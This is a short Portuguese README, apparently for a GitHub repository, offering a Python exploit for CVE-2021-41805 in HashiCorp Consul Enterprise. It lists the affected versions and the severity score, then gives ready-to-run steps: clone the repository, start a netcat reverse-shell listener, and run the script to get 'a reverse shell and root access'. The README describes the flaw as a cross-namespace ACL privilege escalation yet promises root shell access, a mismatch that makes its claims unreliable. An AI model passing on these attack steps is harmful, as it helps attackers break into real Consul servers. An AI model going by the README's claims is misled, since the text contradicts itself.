
Exploit do HashiCorp Consul com python. (CVE-2021-41805)
HashiCorp Consul Enterprise antes de 1.8.17, 1.9.x antes de 1.9.11 e 1.10.x antes de 1.10.4 tem Controle de Acesso Incorreto. Um token ACL (com as permissões padrão operator:write) em um namespace pode ser usado para escalonamento indevido de privilégios em um namespace diferente.
CVE_ID : CVE-2021-41805
Pontuação Base : 8.8
Gravidade : Alta
Emitido em : 2021-12-12
Versões Afetadas : HashiCorp Consul Enterprise antes de 1.8.17, 1.9.x antes de 1.9.11 e 1.10.x antes de 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Obtenha um reverse shell e acesso root.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Em seguida, inicie o listener:
sudo nc -lvnp <port>
Em seguida, execute o exploit:
python3 CVE-2021-41805.py